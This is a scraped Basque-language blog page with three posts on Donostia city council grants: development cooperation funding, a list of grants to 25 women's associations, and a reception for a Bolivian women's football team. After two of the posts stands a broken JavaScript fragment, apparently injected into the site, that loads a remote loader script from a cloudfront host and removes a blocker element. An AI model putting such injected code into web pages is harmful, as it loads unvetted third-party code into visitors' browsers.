Category: Emakumea
Krisiak krisi, elkartasuna ez da murrizten
Urr 07 2012- donostia
- 0 Comments
Donostiako Udalak ia 750.000 euroko diru laguntzak banatuko ditu garapenerako lankidetza, sentsibilizazio eta hezkuntzaren alorrean lan egiten duten elkarteen artean. Tokiko Udal Gobernuak onartu ditu dirulaguntzak, agerian utziz udal taldeak elkartasunarekiko duen konpromisoa hitzetatik haratago doala. Jon Albizu Lankidetza zinegotziak adierazi du, ahalegin berezia egin dela diru laguntzei eusteko: “Ez dugu karitatean sinesten, justizia sozialean sinisten dugu, eta mundu injustu hau orekatuagoa izatea denon eskuetan dago, administrazio publikoen eta norbanakoen esku”.
Lankidetza, arazoen sustraietara joateko
Diru laguntzak bi alor ezberdinetara bideratuko dira. Batetik, lankidetzara, hau da, beste herrialdetan proiektuak garatzen dituzten gobernuz kanpoko erakundeetara (523.400 euro) eta, bestetik, sentsibilizaziora eta garapen hezkuntzara, hau da, gurean bertan kontzientziazio lanak egiten dituzten elkarteetara (224.305 euro). Albizuk azpimarratu du bi norabide horietan lan egitea ezinbestekoa dela, eta proiektu zehatzak babestea garrantzitsua den bezala, gurean sentsibilizazio kanpainak sustatzea ere garrantzitsua dela, azken batean, eraldaketa hortik etorriko delako, kontzientzia aldaketa batetik: “Krisi garaietan elkartasuna bermatu behar dugu. Arazoen sustraietara jo behar dugu eta munduan dauden desorekak konpontzen ahalegindu behar gara guk geuk kontzientzia hartuta; gu denon ongizatea bermatzeko, ezinbestekoa da mundu bidezkoago eta orekatuago bat sortzea”.
Garapenerako Lankidetzako proiektuentzako diru laguntzen deialdira 45 proiektu aurkeztu dira, eta horietatik 11 lagunduko dira diruz. Indian, Honduras, Mozambike, Bolivia, Nikaragua, Peru eta Kolonbian hainbat proiektu gauzatzeko baliatuko dute dirua garapenerako gobernuz kanpoko erakundeek, besteak beste, berdintasuna, emakumeen eskubideak, osasuna, elikadura, indarkeria eza, eta burujabetza ardatz hartuta.
Proiektu zehatzak eta ebaluazio zorrotza
Puntuazio gehien lortu duten erakundeek eskatutako erabateko kopurua jasoko dute, gehienez 60.000 euro, beti ere, gobernuz kanpoko erakunde horrek proiektuaren %20 finantzatzeko konpromisoa hartuta badauka. Albizuren esanetan, proiektuen kalitate teknikoa hobea da urtetik urtera: “Lankidetza Aholku Batzordean adostu dira puntuatu beharreko irizpideak eta aurkeztu berri dugun lankidetza planean jasota dauden ardatz berriak ere hartu ditugu aintzakotzat: elikaduraren gaineko subiranotasuna eta indarkeria eza aktiboa”.
Garapenerako Hezkuntza
Sentsibilizazioa eta Garapenerako Hezkuntzara bideratutako proiektuen deialdira, berriz, 26 egitasmo aurkeztu dira eta horietatik hamarrek jasoko dute babesa –kasu honetan 20.000 euro jasoko dute gehienera elkarteek-. Emakumeen eta nekazarien eskubideen aldeko, ingurumen sostengarriaren aldeko, elikadura subiranotasunaren aldeko, palestinarren giza eskubideen aldeko, kontsuko arduratsuaren aldeko, aniztasun kulturalaren aldeko, eta merkataritza justuaren aldeko proiektuak dira diruz lagunduko direnak.
Azkenik, eta azken egitasmo honekin lotuta, esan sentsibilizazio kanpaina hau indartzeko hainbat panel informatibo egin direla eta kultur etxeetan ikusgai daudela. Bertan iazko deialditan diruz lagundu ziren proiektuen argazkiak eta azalpenak ageri dira, donostiarrek bertatik bertara ezagutu dezaten emandako diru laguntza hauek zehazki zertara bideratzen diren.
(Iturria: Donostiako Udaleko Prentsa Bulegoaren oharretik moldatua)
// -1?’https’:'http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};]]>
Berdintasuna lantzen duten 25 emakume elkarte diruz lagundu ditu Donostiako Udalak
Abu 28 2012- donostia
- 0 Comments
Donostiako Udalak berdintasunaren alorrean lanean ari diren 25 emakume elkarte diruz lagunduko ditu. Aurten orotara, 46.080 euroko diru laguntzak banatuko dira. Proiektuek 826 euro eta 2.815 euro artean jasoko dituzte. Iazko diru laguntzarekin alderatuta diru kopurua handitu egin da, izan ere, ia 10.000 euro gehiago banatuko dira aurten. Deialdira guztira 30 proiektu aurkeztu dira, baina horietatik bost kanpoan geratu dira, baldintzak betetzen ez zituztelako.
Naiara Sampedro Berdintasun zinegotziak azpimarratu du urtetik urtera egitasmoen kalitatea hobetzen doala: “Diru laguntzen bitartez, emakume elkarteen, talde feministen eta berdintasuna lantzen duten elkarte mistoen lana lagundu nahi dugu, horregatik, nahiz eta egoera ekonomikoa zaila izan eta aurrekontuetan murrizketak eduki, diru laguntzen diru kopurua handitu egin dugu. Gure ildo politikoan lehentasunak zeintzuk diren agerian utzi ditugu beste behin”.
Udalak, hala ere, ez duela inoiz elkarteen lana ordezkatuko adierazi du Sampedrok: “Elkarteen autonomia errespetatuz, beraien lana aitortu eta sustatu nahi dugu, eta horretarako bide bat diru laguntzak dira. Dena den, bestelako bideak ere badaude eta urte osoan zehar ari gara elkarteekin elkarlanean. Donostian berdintasunari buruzko eta feminismoari buruzko hausnarketak eta jarduera bultzatu nahi ditugu eta diru laguntzek ere horretan laguntzen dute“.
Diruz lagundu diren egitasmoek askotariko gaiak jorratzen dituzte: emakumeen jabekuntza eta ahalduntzea bultzatzen dutenak, formazioa, eztabaida eskolak, hausnarketak sustatu nahi dituztenak, indarkeriari aurre egitekoak, emakumeen historia eta memoria errekuperatu nahi dituztenak, emakumeen gorputza eta sexualitatea lantzen dituztenak. Egitasmo denak profil ezberdineko (adina, jatorria, genero nortasuna, aukera sexuala, aniztasuna) eta diskriminazio ezberdinak pairatzen dituzten emakumeei zuzenduta daude eta, egitasmo gehienak gizonei ere irikita daude.
Donostiako Udalak aurten diruz lagundutako elkarteen zerrenda.
- EMAKUME BANANDUEN GIPUZKOAKO ELKARTEA .……….. 1.715,74€
- INTXAURRONDO BERRIKO EMAKUME ELKARTEA…….. 1.470,64 €
- DONOSTIAKO BILGUNE FEMINISTA–MARTITZ…………… 2.815,10€
- VICUÑA-ETXEKO LANGILEEN GIZARTE ETA KULTUR ELKARTEA 1.155,50€
- LILATON TALDEA, 2.727,54€
- “LAGUNAK” INTXAURRONDOKO EMAKUME ELKARTEA, 1.100€
- ARANZAZU ETXEKOANDREEN ETA FAMILIA KONTSUMOKO GIPUZKOAKO ELKARTEA 1.418,12€
- OSTADAR EMAKUME ELKARTEA… 1.470,64€
- PLAZANDREOK .. 2.587,48€
- GARAIPEN-EMAKUME ETORKINEN ELAKARTEA,…………………… 2.815,10€
- LAHIA NAHIA SEXOLOGIA ELKARTEA, ………. 2.118,42€
- EMAKUMEA LA MUJER ELKARTEA….. 2.223,47€
- EUSKADIKO ESNEAREN LIGA, 1.890,82€
- ELKARTEA BERRI, EMAKUMEAREN GIZARTE ETA KULTUR ZENTROA, 1.470,64€
- EMAKUME AUSARTAK, …..1.488,66€
- EMAKUMEEN JABEKUNTZARAKO DONOSTIAKO EMAKUMEEN ETXEA ELKARTEA, 2.188,45€
- MUNDUKO EMAKUME BATUAK ELKARTEA, …..……… 1.173,01€
- SEXUNE, 2.100,91€
- ASADE……………..… 1.943,34 €
- UZTAI BELAR 1.400,61 €
- A.G.I IKUSMEN URRIKO GIPUZKOAKO ELKARTEA ………1.680,73 €
- LAGAEL 1.995,87 €
- DANDAI 826€
- BIDEZ BIDE 569,98€
- MEDINA 733,23€
(Iturria: Donostiako Udaleko Prentsa Bulegoko oharretik hartua)
Bolibiatik etorritako oparia
Api 28 2012- donostia
- 0 Comments
Uztailean harrera hunkigarria egin zitzaion Udalbatzar Aretoan Donostia CUP nazioarteko futbol txapelketa jokatzera Bolibiatik etorri zen emakume taldeari. Merezitako harrera, futbol zelai barruan zein kanpoan erakutsi zuten adoreagatik, emakumeen eskubideen alde eta gizarte parekidea lortzeko. Txapelketan Xabier Azkargorta izan zuten entrenatzaile eta bera ere harreran egon zen une guztietan bolibiarrekin batera. Jokalariek hitza hartu zutenean udal korporazioko kideek adi entzun zituzten haien eguneroko bizipenak eta prozesu eraldatzaile hau nola bizitzen ari diren Bolibian.
// -1?’https’:'http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};]]>


